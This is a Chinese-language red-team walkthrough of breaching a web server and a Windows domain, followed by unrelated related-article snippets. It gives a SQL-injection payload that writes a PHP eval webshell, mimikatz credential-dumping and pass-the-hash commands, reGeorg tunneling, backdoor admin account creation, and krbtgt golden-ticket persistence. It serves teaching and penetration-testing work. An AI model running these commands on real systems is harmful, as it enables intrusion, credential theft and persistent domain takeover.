紅隊攻防實戰之從邊界突破到漫游內網(無cs和msf)

也許有一天我們再相逢,睜大眼睛看清楚,我才是英雄。

本文首發于先知社區,原創作者即是本人

本篇文章目錄

在這里插入圖片描述

網絡拓撲圖:

本次紅隊攻防實戰所需繪制的拓撲圖如下:

在這里插入圖片描述

邊界突破

訪問網站:

http://xxx.xxx.xxx/?id=1

首頁如下:

在這里插入圖片描述

SQL注入拿shell

構造payload:and 1=1顯示正確,and 1=2顯示錯誤,說明存在SQL注入,并且爆出絕對路徑

在這里插入圖片描述

使用常用的注入函數into outfile 將一句話木馬寫入自動創建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有寫入權限和上一步爆出的絕對路徑

在這里插入圖片描述

驗證上傳的木馬是否成功,成功寫入木馬

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在這里插入圖片描述

成功利用蟻劍拿到shell

在這里插入圖片描述

內網信息收集

whoami
發現是普通用戶的權限

在這里插入圖片描述

ipconfig /all
查看用戶的IP信息,可以看到位于工作組環境

在這里插入圖片描述

route print
查看路由,通往10.0.1網段

在這里插入圖片描述

net config Workstation
查看計算機名、全名、用戶名、系統版本、工作站

在這里插入圖片描述

利用蟻劍傳入Potato提權工具,并使用其虛擬終端,查看權限,提權。
將超時時間調大:

在這里插入圖片描述

上傳Potato提權工具成功,改名為xxx.exe

在這里插入圖片描述

使用命令可以看到成功提權
xxx.exe -p “whoami”

在這里插入圖片描述

將mimikatz改名為x.exe,成功上傳

在這里插入圖片描述

然后在終端執行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

在這里插入圖片描述

查看log.txt,成功抓到當前用戶和另一用戶的密碼

在這里插入圖片描述

在這里插入圖片描述

netstat -ano查看是否開啟3389端口,發現已開啟

在這里插入圖片描述

查看防火墻是開啟的
netsh firewall show state

在這里插入圖片描述

reGeorg內網穿透

使用軟件reGeorg實現攻擊機與目標機器的通信
通過蟻劍將reGeorge中的tunnel.php上傳至網站改名為tu.php

在這里插入圖片描述

并成功訪問

http://xx.xx.xx/tu.php

在這里插入圖片描述

啟動reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都轉發給指定的那個url,1080是指定的監聽端口;

在這里插入圖片描述

代理可以使用:

在這里插入圖片描述

內網滲透

拿下邊界服務器

掛上代理遠程連接10.0.1.4

在這里插入圖片描述

創建新賬號admin 并提權

xx.exe -p "net user xxx xxxx /add" //新增賬號和對應密碼
xx.exe -p "net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組

在這里插入圖片描述

遠程連接

在這里插入圖片描述

成功連接

在這里插入圖片描述

將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼

在這里插入圖片描述

成功抓到管理員賬戶密碼:
使用上述管理員賬號密碼,成功登陸服務器

在這里插入圖片描述

通過nbtscan對當前C端進行掃描,發現還有三臺機器存活

在這里插入圖片描述

拿下域內主機

根據我這個攻防時長兩年半的個人練習生的經驗來判斷,內網里的服務器的賬號密碼有部分可能是相同的。
再使用上述管理員賬號密碼遠程連接10.0.1.8

在這里插入圖片描述

成功連接

在這里插入圖片描述

whoami查看是administrator權限
ipconfig /all查看有域xx.xx

在這里插入圖片描述

一般DNS服務器就是域控服務器

在這里插入圖片描述

查詢域控主機名,遭拒絕,需利用官方工具將賬號提升至system權限再查
net user /domain

在這里插入圖片描述

上傳官方工具PsExec.exe提權
PsExec.exe -i -s -d cmd 提升至system權限,獲取主機名DC.xx.xx

在這里插入圖片描述

嘗試訪問域控主機C盤
dir \DC.xx.xx\c$

在這里插入圖片描述

是拒絕的,需要工具minikatz,使用哈希傳遞

拿下域控

將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼

在這里插入圖片描述

獲取

user=administrator
Domain=xxx
NTLM=xxxxxxx

將上述值放入下方命令中,完成哈希傳遞,以后利用這個CMD窗口運行,擁有管理員權限。

sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx

啟動域控主機cmd窗口,成功訪問域控主機C盤
dir \DC.xx.xx\c$

在這里插入圖片描述

使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
進入c:
輸入ipconfig, 10.0.1.6為域控ip,此時成功獲取域控cmd

在這里插入圖片描述

新建賬號,直接遠程登陸域控主機

"net user xxx xxxx /add" //新增賬號和對應密碼
"net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組

在這里插入圖片描述

建好賬號后,直接登陸域控主機10.0.1.6(DC.xx.xx),成功拿下域控主機權限

在這里插入圖片描述

至此已成功拿下三臺主機的權限。

在這里插入圖片描述

權限維持

可通過制作黃金票據進行權限維持
因為域控主機10.0.1.6安裝了補丁KB2871997,所以無法抓取到明文密碼
管理員運行獼猴桃
log 日志記錄內容
lsadump::dcsync /user:krbtgt 獲取內容

在這里插入圖片描述

獲取krbtgt賬號的關鍵值(OSID和Hash_NTLM)

在這里插入圖片描述

制作黃金票據

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如圖

在這里插入圖片描述

票據加載成功

在這里插入圖片描述

普通窗口無法訪問域控根目錄

在這里插入圖片描述

把域控中的票據復制到在10.0.1.8主機中,使用獼猴桃加載票據
kerberos::ptt xxx.kiribi 加載票據

在這里插入圖片描述

然后成功在普通cmd中訪問域控c盤內容
dir \DC.xx.xx\c$

在這里插入圖片描述

PExec.exe \DC.xx.xx cmd 獲取域控cmd

在這里插入圖片描述

網絡安全感悟

做網絡安全是一個長期的過程,因為做網絡安全沒有終點,不管是網絡安全企業,還是在網絡安全行業各種不同方向的從業人員,不管你選擇哪個方向,只有在這條路上堅持不懈,才能在這條路上走的更遠,走的更好,不然你肯定走不遠,遲早會轉行或者被淘汰,把時間全浪費掉。如果你覺得自己是真的熱愛網絡安全這個行業,堅持走下去就可以了,不用去管別人,現在就是一個大浪淘金的時代,淘下去的是沙子,留下來的才是金子,正所謂,千淘萬漉雖辛苦,吹盡狂沙始到金,網絡安全的路還很長,一生只做一件事,堅持做好一件事!

文筆生疏,措辭淺薄,望各位大佬不吝賜教,萬分感謝。

免責聲明:由于傳播或利用此文所提供的信息、技術或方法而造成的任何直接或間接的后果及損失,均由使用者本人負責, 文章作者不為此承擔任何責任。

轉載聲明:各家興 擁有對此文章的修改和解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經作者允許,不得任意修改或者增減此文章的內容,不得以任何方式將其用于商業目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公眾號:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社區:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/167443.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/167443.shtml
英文地址,請注明出處:http://en.pswp.cn/news/167443.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

leetcode刷題記錄——1991. 找到數組的中間位置

找到數組的中間位置 給你一個下標從 0 開始的整數數組 nums &#xff0c;請你找到 最左邊 的中間位置 middleIndex &#xff08;也就是所有可能中間位置下標最小的一個&#xff09;。 中間位置 middleIndex 是滿足 nums[0] nums[1] … nums[middleIndex-1] nums[middleInd…

數據傳輸的思考

Wi-Fi&#xff1a;Wi-Fi是一種無線網絡技術&#xff0c;可以用于無線互聯網接入、局域網通信和數據傳輸等。Wi-Fi基于IEEE 802.11標準&#xff0c;通過無線信號傳輸數據&#xff0c;提供高速的無線網絡連接。Wi-Fi可用于連接設備與路由器或者設備之間的直接通信&#xff0c;可以…

Linux 排查必看文件

目錄 1. 登錄日志 1.1 /var/log/wtmp 1.2 /var/log/btmp.* 1.3 /var/log/lastlog 1.4 /var/log/faillog 1.5 /var/log/secure 1.6 /var/log/auth.log 2. 系統日志 2.1 /var/log/cron.* 2.2 /var/log/syslog 2.3 /var/log/audit/audit.*log 3. 歷史命令 3.1 ~/…

Docker 中OpenResty下載與使用

1Panel安裝OpenResty 查看到就說明安裝成功 部署項目 在http中添加&#xff1a; server { listen 8001; //端口號 server_name localhost; location / { root /admin; //項目路徑 index index.html index.htm; …

Java二級醫院區域HIS信息管理系統源碼(SaaS服務)

一個好的HIS系統&#xff0c;要具有開放性&#xff0c;便于擴展升級&#xff0c;增加新的功能模塊&#xff0c;支撐好醫院的業務的拓展&#xff0c;而且可以反過來給醫院賦能&#xff0c;最終向更多的患者提供更好的服務。 系統采用前后端分離架構&#xff0c;前端由Angular、J…

P1028 [NOIP2001 普及組] 數的計算

時刻記住一句話&#xff1a;寫遞歸&#xff0c;1畫圖&#xff0c;2大腦放空&#xff01;&#xff01;&#xff01; 意思是&#xff0c;自己寫遞歸題目&#xff0c;先用樣例給的數據畫圖&#xff0c;然后想一個超級簡單的思路&#xff0c;直接套上去就可以了。 上題干&#xff…

牛客 HJ106 字符逆序 golang實現

牛客題目算法連接 題目 golang 實現 package mainimport ("fmt""bufio""os" )func main() {str, _ : bufio.NewReader(os.Stdin).ReadString(\n)if len(str) 0 {return } else {newstr:""strLen:len(str)-1for i:strLen;i>0;i-…

生產環境出現問題,測試人如何做工作復盤?

很多時候我們能把大部分的Bug或一些部署等問題在業務上線之前就解決了&#xff0c;但由于某些因素&#xff0c;線上問題還是時而出現&#xff0c;影響業務生產甚至是公司效益。 避免線上問題的發生以及線上問題及時處理是測試人員的一項重要職責&#xff0c;如何快速地處理&am…

XG916Ⅱ輪式裝載機后驅動橋設計機械設計CAD

wx供重浩&#xff1a;創享日記 對話框發送&#xff1a;裝載機 獲取完整論文報告工程源文件 本次設計內容為XG916Ⅱ裝載機后驅動橋設計&#xff0c;大致上分為主傳動的設計&#xff0c;差速器的設計&#xff0c;半軸的設計&#xff0c;最終傳動的設計四大部分。其中主傳動錐齒輪…

【多線程】Thread類的使用

目錄 1.概述 2.Thread的常見構造方法 3.Thread的幾個常見屬性 4.啟動一個線程-start() 5.中斷一個線程 5.1通過共享的標記來進行溝通 5.2 調用 interrupt() 方法來通知 6.等待一個進程 7.獲取當前線程引用 8.線程的狀態 8.1所有狀態 8.2線程狀態和轉移的意義 1.概述 …

Relabel與Metic Relabel

Prometheus支持多種方式的自動發現目標&#xff08;targets&#xff09;&#xff0c;以下是一些常見的自動發現方式&#xff1a; 靜態配置&#xff1a;您可以在Prometheus配置文件中直接列出要監測的目標。這種方式適用于目標相對穩定的情況下&#xff0c;例如固定的服務器或設…

HCIA-RS基礎:動態路由協議基礎

摘要&#xff1a;本文介紹動態路由協議的基本概念&#xff0c;為后續動態路由協議原理課程提供基礎和引入。主要講解常見的動態路由協議、動態路由協議的分類&#xff0c;以及路由協議的功能和自治系統的概念。文章旨在優化標題吸引力&#xff0c;并通過詳細的內容夯實讀者對動…

自求導的方法實現線性回歸算法

線性回歸是一種常用的回歸算法&#xff0c;用于建立輸入變量和連續輸出變量之間的關系。傳統的線性回歸算法通常依賴于繁瑣的數學推導和梯度計算。但是&#xff0c;隨著深度學習的興起&#xff0c;自求導的方法逐漸成為實現線性回歸算法的有效途徑。本文將介紹如何使用自求導的…

視頻網站適合租用服務器嗎?

視頻網站適合租用服務器嗎&#xff1f; 談到服務器租用&#xff0c;在服務器租用市場中&#xff0c;通常比較常見的用戶群體有電商、外貿和視頻等網站。在這里相信很多用戶都有疑問&#xff1a;租用的服務器適不適合用來建立視頻網站呢&#xff1f;接下來我們一起來看看吧~ 首…

VMware安裝windows操作系統

一、下載鏡像包 地址&#xff1a;鏡像包地址。 找到需要的版本下載鏡像包。 二、安裝 打開VMware新建虛擬機&#xff0c;選擇用鏡像文件。將下載的鏡像包加載進去即可。

python opencv 邊緣檢測(sobel、沙爾算子、拉普拉斯算子、Canny)

python opencv 邊緣檢測&#xff08;sobel、沙爾算子、拉普拉斯算子、Canny&#xff09; 這次實驗&#xff0c;我們分別使用opencv 的 sobel算子、沙爾算子、拉普拉斯算子三種算子取進行邊緣檢測&#xff0c;然后后面又使用了Canny算法進行邊緣檢測。 直接看代碼&#xff0c;代…

論文導讀 | 10月專題內容精選:人的預測

編者按 本次論文導讀&#xff0c;編者選擇了10月份OR和MS上與"人的預測"有關的三篇文章&#xff0c;分別涉及群體智慧的提取&#xff0c;個體序列預測的評估&#xff0c;以及決策者對風險的扭曲感知在分布式魯棒優化中的應用。其中&#xff0c;從基于"生成式可能…

Django框架之csrf跨站請求

目錄 一、csrf跨站請求偽造詳解 二、csrf跨域請求偽造 【1】正常服務端 【2】釣魚服務端 三、csrf校驗 【介紹】 form表單中進行csrf校驗&#xff1a; 【1】form表單如何校驗 【2】ajax如何校驗 四、csrf相關裝飾器 【1】csrf_protect裝飾器&#xff1a; 【…

使用VUE3實現簡單顏色盤,吸管組件,useEyeDropper和<input type=“color“ />的使用

1.使用vueuse中的useEyeDropper來實現滴管的功能和使用input中的type"color"屬性來實現顏色盤 效果&#xff1a; 圖標觸發吸管 input觸發顏色盤 組件代碼部分 &#xff1a;<dropper> ---- vueuse使用 <template><div class"sRGBHexWrap fbc…

【Python百寶箱】第三維度的魔法:探索Python游戲世界

Python在游戲開發中的魔力 前言 游戲開發一直是計算機科學中最引人入勝和具有挑戰性的領域之一。隨著技術的不斷進步&#xff0c;開發者們尋找著更快、更靈活的工具來實現他們的創意。在這個探索的過程中&#xff0c;Python以其簡潔、易學和強大的特性成為了游戲開發的熱門選…